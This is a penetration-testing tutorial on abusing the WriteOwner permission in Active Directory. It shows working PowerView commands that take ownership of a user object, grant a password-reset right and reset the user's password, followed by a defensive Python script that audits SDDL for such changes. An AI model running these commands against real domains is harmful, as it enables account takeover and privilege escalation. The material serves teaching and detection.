# WriteOwner Exploit

## What is the WriteOwner Permission For?

Active Directory objects such as users and groups are securable objects, and the ACEs in each object's DACL define who can read or modify it (i.e. change the account name, reset the password, etc.). An attacker who holds the WriteOwner permission on an object can change its owner to an attacker-controlled user and, since an object's owner is allowed to modify its DACL, take over the object.

## Scenario:

You have managed to compromise an account belonging to Tom. Running BloodHound showed that there was no direct access from Tom's account to Domain Admins. Checking **Outbound Object Control** revealed an attack path from Tom to the **Backup Admin** group through Claire.

![Outbound Control Option](/files/-MQDP-k8e4ZU3P5mcAq5)

![Attack Path Identified](/files/-MQDP5cmEv2AbdZsvO7z)

#### Attack Path

1. Tom has `WriteOwner` permissions over Claire
2. Claire has `GenericWrite` permissions over the group `BACKUP_ADMINS`
3. `BACKUP_ADMINS` sounds interesting :)

In order to easily take advantage of the `WriteOwner` and `GenericWrite` permissions, we’ll use `PowerView`, which is part of the [PowerSploit](https://github.com/PowerShellMafia/PowerSploit.git) collection.

```
### Set tom as the owner of the claire user object
Set-DomainObjectOwner -Identity claire -OwnerIdentity tom

### As owner, grant tom the ResetPassword right in claire's DACL
Add-DomainObjectAcl -TargetIdentity claire -PrincipalIdentity tom -Rights ResetPassword

### Convert the new password to a SecureString and reset claire's password.
### NOTE!! IN A REAL PENTEST YOU WOULD ENABLE REVERSIBLE ENCRYPTION OR MAKE USER KERBEROASTABLE OR SOMETHING ELSE AND NOT CHANGE THE PASSWORD IN A PRODUCTION ENVIRONMENT
### Single quotes keep PowerShell from treating "$" as the start of a variable
$cred = ConvertTo-SecureString 'qwer1234QWER!@#$' -AsPlainText -Force
Set-DomainUserPassword -Identity claire -AccountPassword $cred
```

![Screenshot for reference](/files/-MQDPJ19BsoNaV7xeZWa)

Success. You can now log in as Claire using the new password: **qwer1234QWER!@#$**

![](/files/-MQDPR_2VHlfytI5vBWx)
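
From the defender's side, the state these commands leave behind is visible in Claire's security descriptor. The following is an added example, not part of the original tutorial: it parses an SDDL string and flags an unexpected owner plus WriteOwner or password-reset ACEs held by principals outside an allow-list. The SID, both SDDL strings and the `TRUSTED` set are constructed for illustration.

```python
import re

WRITE_OWNER, GENERIC_ALL, CONTROL_ACCESS = 0x80000, 0x10000000, 0x100
# Extended-right GUID for User-Force-Change-Password (password reset).
RESET_PASSWORD = "00299570-246d-11d0-a768-00aa006e0529"

def parse_sddl(sddl):
    """Return (owner, aces) from the O: and D: parts of an SDDL string."""
    owner = re.search(r"O:(.+?)(?=G:|D:|S:|$)", sddl)
    dacl = re.search(r"D:[A-Z]*((?:\([^)]*\))+)", sddl)
    aces = []
    for body in re.findall(r"\(([^)]*)\)", dacl.group(1) if dacl else ""):
        kind, _flags, rights, obj, _inherit, sid = body.split(";")[:6]
        aces.append({"type": kind, "rights": rights, "object": obj.lower(), "sid": sid})
    return (owner.group(1) if owner else None), aces

def has_right(rights, code, mask):
    """Rights are either a hex access mask or a run of two-letter codes."""
    if rights.lower().startswith("0x"):
        return bool(int(rights, 16) & mask)
    return code in {rights[i:i + 2] for i in range(0, len(rights), 2)}

def audit(sddl, trusted):
    """Flag an untrusted owner and untrusted allow-ACEs that permit takeover."""
    owner, aces = parse_sddl(sddl)
    findings = [("owner", owner)] if owner not in trusted else []
    for ace in aces:
        if ace["sid"] in trusted or ace["type"] not in ("A", "OA"):
            continue
        r = ace["rights"]
        if has_right(r, "WO", WRITE_OWNER) or has_right(r, "GA", GENERIC_ALL):
            findings.append(("WriteOwner", ace["sid"]))
        # An empty object GUID on a CR ACE means all extended rights.
        if has_right(r, "CR", CONTROL_ACCESS) and ace["object"] in ("", RESET_PASSWORD):
            findings.append(("ResetPassword", ace["sid"]))
    return findings

# Constructed sample data: TOM is a made-up SID; TRUSTED is an assumed allow-list.
TOM = "S-1-5-21-1111111111-2222222222-3333333333-1104"
TRUSTED = {"DA", "BA", "SY"}
REST = "(A;;GA;;;DA)(A;;0xf01ff;;;SY)(A;;RPLCLORC;;;AU)"
BEFORE = f"O:DAG:DAD:AI(A;;WO;;;{TOM}){REST}"
AFTER = f"O:{TOM}G:DAD:AI(A;;WO;;;{TOM})(OA;;CR;{RESET_PASSWORD};;{TOM}){REST}"

if __name__ == "__main__":
    for label, sddl in (("before", BEFORE), ("after", AFTER)):
        print(label, audit(sddl, TRUSTED))
```

`BEFORE` models the misconfiguration BloodHound reported (a `WO` ACE for Tom), and `AFTER` models the object once ownership and the reset right have been changed. Conditional ACEs, which contain nested parentheses, are outside what this parser handles.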

